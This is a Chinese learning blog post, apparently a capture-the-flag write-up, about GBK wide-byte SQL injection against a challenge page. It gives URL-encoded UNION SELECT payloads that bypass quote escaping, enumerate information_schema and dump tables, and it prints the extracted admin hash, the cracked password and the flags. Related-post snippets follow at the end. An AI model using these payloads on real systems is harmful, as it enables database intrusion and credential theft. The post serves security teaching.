2. 程式人生 > >(學習)SQL注入--寬位元組注入

(學習)SQL注入--寬位元組注入

阿新 發佈:2018-10-31

SQL注入–寬位元組注入

實踐:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1

頁面顯示:

顯然執行的查詢語句是:

select id,title from news where id = '1'

其中id就是傳入的引數

首先嚐試了單引號

?id=1%27

發現頁面輸出

顯然引號被轉義了,在前面加了一個 \ 符號

嘗試 如果構造 \ \ 那麼後面的引號也就可以發揮作用了

想到了 寬位元組注入 嘗試

?id=1%df%23

發現報錯了,說明還是存在注入的嘛

接著嘗試

?id=1%df%df%23

發現,查詢又恢復正常了,因為%df%df 雙位元組構成了一個漢字,而%df%23又不成漢字

檢測到這裡,發現應該是可以寬位元組注入了,那麼就開始吧

?id=1%a1%27

發現轉義已經被寬位元組合併了,那麼後面我們就可以幹正事了!

?id=-1%a1%27%20union%20select%201,2%20from%20news%23

可以看出構造了id=-1的假條件從而去執行後面的select語句,發現頁面中的2已經可以成為注入點

先測試一下注入點好用不!

?id=-1%a1%27%20union%20select%201,version()%20from%20news%23

 

?id=-1%a1%27%20union%20select%201,database()%20from%20news%23


?id=-1%a1%27%20union%20select%201,user()%20from%20news%23

發現,別的沒做啥過濾,那麼就從系統自帶資料庫入手,看看能不能查出來別的資料庫

?id=-1%a1%27%20union%20select%201,SCHEMA_NAME%20from%20information_schema.SCHEMATA%20limit%200,1%23
#得到第一個庫名
#主要語句:SCHEMA_NAME from information_schema.SCHEMATA limit 0,1#

嘗試limit 0,2 想得到第二個庫名,發現好像只有一個 information_schema 資料庫,奇怪的很。

不管這麼多,剛才用database()返回了當前的資料庫 sae-chinalover ,就從這個資料庫入手,查所有表!!

?id=-1%a1%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23
# 主要語句:group_concat(table_name) from information_schema.tables where table_schema=database()#

發現有五個表:ctf、ctf1、ctf2、ctf3、ctf4、news

著手第一個ctf表 

?id=-1%a1%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x637466%23
#這邊英文引號被轉義了,所以本來的table_name='ctf'不能使用了
#這邊使用了把'ctf'轉成了16進位制 -> 0x637466   
#當然也可以使用CHAR()10進位制來表示 CHAR(99,116,102)
?id=-1%a1%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=CHAR(99,116,102)%23

發現ctf表中,有user,pw 欄位

同樣的方法進行

最後得到

表:

ctf:    user,pw
ctf1:   空表
ctf2:   id,content
ctf3:   id,email,token
ctf4:   id,flag
news:   id,title

最後啥都知道了,查詢出來看看唄

#針對ctf表,
?id=-1%a1%27%20union%20select%201,group_concat(user,pw)%20from%20ctf%23


# ctf表
user:admin
pw:21dd715a3605b2a4053e80387116c190
#md5破解可得 
pw:njupt

同理,別的表進行查詢 ctf2 表

# ctf2表
id:1020
content:no msg in 1020
id:1021
content:no msg in 1021 too
id:1022
content:no msg in 1022
id:1023
content:no msg in 1023~~~
id:1024
content:the flag is:nctf{query_in_mysql}
id:1025
content:no more

ctf3 表

id:1
email:[email protected]
token:0

ctf4 表

id:1
flag:nctf{gbk_3sqli}

news 表

id:1
title:Hello World!OVO
id:2
title:gbk_sql_injection
id:3
title:the fourth table

至此,所有注入已經完成,同時發現了兩個flag

nctf{query_in_mysql}
nctf{gbk_3sqli}

相關推薦

(學習)SQL注入--位元組注入

SQL注入–寬位元組注入 實踐: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1 頁面顯示: 顯然執行的查詢語句是: select id,title from news where id = '1' 其

Sql 注入詳解:位元組注入+二次注入

sql注入漏洞 原理:由於開發者在編寫操作資料庫程式碼時,直接將外部可控引數拼接到sql 語句中,沒有經過任何過濾就直接放入到資料庫引擎中執行了。 攻擊方式: (1) 許可權較大時,直接寫入webshell 或者直接執行系統命令 (2) 許可權較小時,通過注入獲得管理

SQL注入教程——(四)位元組注入

前言 在mysql中,用於轉義(即在字串中的符號前加上”\”)的函式有addslashes,mysql_real_escape_string,mysql_escape_string等,還有一種情況是magic_quote_gpc,不過高版本的PHP將去除這個特

sql注入位元組注入

Bugku上看到一道這方面的題,從網上看了不少資料,談一談自己的認識。                      當我們在位址列輸入單引號時頁面並沒有報錯,         說明單引號應該被過濾了,轉義為 \'  防止注入                 

[轉載]sql位元組注入詳解

儘管現在呼籲所有的程式都使用unicode編碼,所有的網站都使用utf-8編碼,來一個統一的國際規範。但仍然有很多,包括國內及國外(特別是非英語國家)的一些cms,仍然使用著自己國家的一套編碼,比如gbk,作為自己預設的編碼型別。也有一些cms為了考慮老使用者,所以出了gbk

位元組注入例項

我們看一下html原始碼 看到編碼變化了 所以是寬位元組注入 所以我們要用%df來代替一個位元組 頁面正確 加個單引號頁面報錯 頁面報錯 存在注入 http://103.238.227.13:10083/?id=1%df' orde

有趣的注入位元組注入

ctf:有趣的注入 (一)手注: url:http://ctf.cdusec.org:8086/sqli.php?id=1 實驗工具:火狐hackbar x001: 輸入:” ‘ “單引號無反應,再輸入" %df’ "(寬位元組注入,顯示報錯。) 截圖: x002判斷列數:判斷出

深入探究位元組注入漏洞與修補原理

 0、前言 最近要為了自動化審計蒐集所有PHP漏洞,在整理注入的時候,發現寬位元組注入中使用iconv造成的漏洞原理沒有真正搞懂,網上的文章也說得不是很清楚,於是看了榮哥(lxsec)以前發的一篇

對於位元組注入字元的一些問題以及理解

   首先%df是url編碼形成的,查詢資料url編碼其實是ascii編碼的16進製表示,在前面加了一個%號,而對照ascii碼錶發現127號是%7F,中文的ascii碼是大於128,所以只要輸入的編碼ascii大小是大於128的,是可以測試成功的,比如說用%8F 這裡

sqli-labs————位元組注入(可以用於繞過濾了單引號或者\的WAF)

寬位元組注入的原理:原理:mysql在使用GBK編碼的時候,會認為兩個字元為一個漢字,例如%aa%5c就是一個漢字(前一個ascii碼大於128才能到漢字的範圍)。我們在過濾 ' 的時候,往往利用的思路

Web漏洞處理--http host頭攻擊漏洞處理方案/檢測到目標URL存在位元組跨站漏洞/ 檢測到目標URL存在SQL注入漏洞

1.配置web 攔截器 <filter> <filter-name>XssSqlFilter</filter-name> <filter-class>com.enation.eop.Se

位元組SQL注入原理

0x01: 經典的SQL注入利用的是沒有任何防範措施的PHP使用SQL查詢語句時可以通過URL輸入造成該語句恆成立,從而可以獲得資料庫中的其他資訊。 舉個例子: <?php $name=$_GET['name'];

【27】WEB安全學習----SQL server注入

一、基礎知識 系統資料庫 master資料庫 master是SQL server最重要的資料庫,是整個資料庫的核心,使用者不能直接修改。裡面資料庫包括使用者的登陸資訊、使用者所在的組、所有系統的配置選項、伺服器中本地資料庫的名稱和資訊、初始化方式等。 model資

【28】WEB安全學習----SQL注入總結

檢測注入 不管什麼資料庫注入,檢測是否有注入點是第一步,而檢測的方法大同小異。 1、閉合SQL拼接語句 要想進行下一步注入,首先需要閉合SQL語句,如何知道閉合符號是什麼呢?可通過在引數後面加入單引號或雙引號使其整條SQL拼接語句失敗,從而可從資料庫報錯資訊得知,若沒有

通過sqli-labs學習sql注入——基礎挑戰之less1

前言:            之前只是簡單瞭解過SQL注入,只僅僅侷限於會使用sqlmap等注入工具,但是手工注入方面就懂的很少了,所以準備通過sqli-lab這個注入平臺的學習好好研究下常見的手工注入方面的

通過sqli-labs學習sql注入——基礎挑戰之less1-10

雖然sql注入接觸過不少,其實也不太多,但是不繫統,那就通過sqli-libs系統學習總結一下吧 注:第一個就說得詳細一點,後面的有新知識才會說,所以第一個一定要看!!!如果第一個還有不明白的地方,歡迎評論提問,注意一定自己要先實踐。 我的學習的方法是什麼呢? 先自己嘗

通過sqli-labs學習sql注入——進階挑戰之less23-28a

這次我又來了,Advanced Injections(進階挑戰),就是一些過濾繞過的東西了,基礎挑戰看這個兩篇 通過sqli-labs學習sql注入——基礎挑戰之less1-10 通過sqli-labs學習sql注入——基礎挑戰之less11-22

SQL注入報錯注入函式彙總

1.floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 原理:https://b

【spring錯誤】在學習rabbitMq時,@Autowired注入的amqpTemplate始終為空

問題 測試rabbitMq傳送端時,發現amqpTemplate為空 @Test public void testMessage() { // 自己new MQSender,amqpTemplate不會被注入 MQSender sender

sql注入報錯注入原理解析

sql注入報錯注入原理詳解 前言 我相信很多小夥伴在玩sql注入報錯注入時都會有一個疑問,為什麼這麼寫就會報錯?曾經我去查詢的時候,也沒有找到滿意的答案,時隔幾個月終於找到搞清楚原理,特此記錄,也希望後來的小夥伴能夠少走彎路 0x01